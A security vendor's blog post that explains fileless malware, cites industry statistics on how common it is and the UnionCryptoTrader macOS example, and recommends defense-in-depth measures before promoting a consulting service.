Fileless Malware Attacks Are Increasingly Common

Let’s face it, securing your data isn’t as simple as downloading antivirus software anymore. To be frank, it hasn’t been for a while now. Cybercriminals are always searching for ways to undermine your first lines of defense, and if you’re not careful, you could be just one mis-click away from a security breach.

2017 changed the game with the introduction of fileless malware – a type of attack that easily bypasses every basic security defense. According to Symantec’s 2019 Internet Security Threat Report, fileless malware is on the rise and it’s one of the biggest digital infiltration threats to companies to date.

What is Fileless Malware?

Traditional anti-malware software works by scanning the files on a computer’s storage drives. If the software finds files that match any of thousands of predetermined signatures, they are flagged as malware. Attackers are increasingly adapting to this method of defense by employing what is called a fileless attack, also known as a zero-footprint attack or non-malware attack. These attacks are categorized as low-observable characteristic (LOC) attacks, which means it is difficult for security solutions to identify and protect against them. 

The Ponemon Institute estimates that fileless attacks are about 10 times more likely to succeed than file-based attacks.

How Prevalent are Fileless Attacks?

In a 2019 Trend Micro Roundup Report, the detection of attacks surged by 265% in the first half of 2019 alone in comparison to the previous year. 

Fileless malware is not dependent on files being installed or executed. Just like traditional malware attacks, a device is infected after a user-initiated action (such as clicking a malicious email link or downloading a compromised software package). In some cases, by abusing PowerShell, certain fileless variants have been seen moving laterally across networks, infecting other computers on the same network. 

Without being stored in a file or installed directly on a machine, infections go straight into memory and the malicious content never touches the hard drive. And because fileless malware doesn’t write anything to disk like traditional malware does, it leaves behind no apparent trace of its existence which allows it to easily avoid detection by antivirus software.

How are Fileless Attacks Avoiding Detection?

According to the 2020 SonicWall Cyber Threat Report, cybercriminals are using new code obfuscation, sandbox detection and bypass techniques. This has resulted in a multitude of variants and the development of newer and more sophisticated exploit kits using fileless attacks instead of traditional payloads to a disk. While malware decreased 6% globally, SonicWall observed that most new threats masked their exploits within today’s most trusted files. In fact, Office (20.3%) and PDFs (17.4%) represent 38% of new threats detected by Capture ATP.

In December 2019, a fileless MacOS malware was discovered distributed as a piece of crypto trading software called UnionCryptoTrader.dmg. Attackers used a trojanized version of a legitimate crypto trading application installer file which was circulated from a crypto trading website called JMTTrading that offered a “smart cryptocurrency arbitrage trading platform.” At the time of writing this, the security research service VirusTotal shows that only about half of Mac OS anti-virus apps can detect the malware – almost a year after it was discovered!

Ways to Prevent Fileless Attacks

Because fileless malware is difficult to identify, the most effective way to avoid being affected is to ensure that your servers and other business machines can’t be easily compromised in the first place. Fileless malware is sophisticated, but like all malware, it depends on the existence of software vulnerabilities to exploit systems. The best way to do this is to implement a multi-layered defense (defense in depth). By actively monitoring and accounting for the entire threat-lifecycle, you give yourself the absolute best chance against malicious attacks.

What are the components of a good defense in depth methodology? The key components involve software, hardware and business operation procedures.  At a bare minimum, you will want:

• A firewall with well designed network routing rules (and possible Intrusion Detection and Prevention (IDS/IPS) components.)  
• Anti-Spam and Anti-Virus components protecting your email systems.
• Anti-Virus applications on all of your servers and workstations.
• Good coding practices and a software firewall to protect your specific application’s ports (whether you’re running custom applications with or without an external access component).
• Regular (annual at a minimum) orientation for your staff to bring them up to speed on best practices for using technology, including things like data access procedures and how not to get phished.

Not all organizations have the resources to build and maintain these technologies and processes in-house. If your organization has gaps in the areas of expertise to secure its infrastructure, consider a Steadfast Security and Compliance Consulation with our team to ensure the infrastructure your organization relies on is protected.

Editor's Note: This post was originally published in December of 2017 and has been completely revamped and updated for accuracy and comprehensiveness.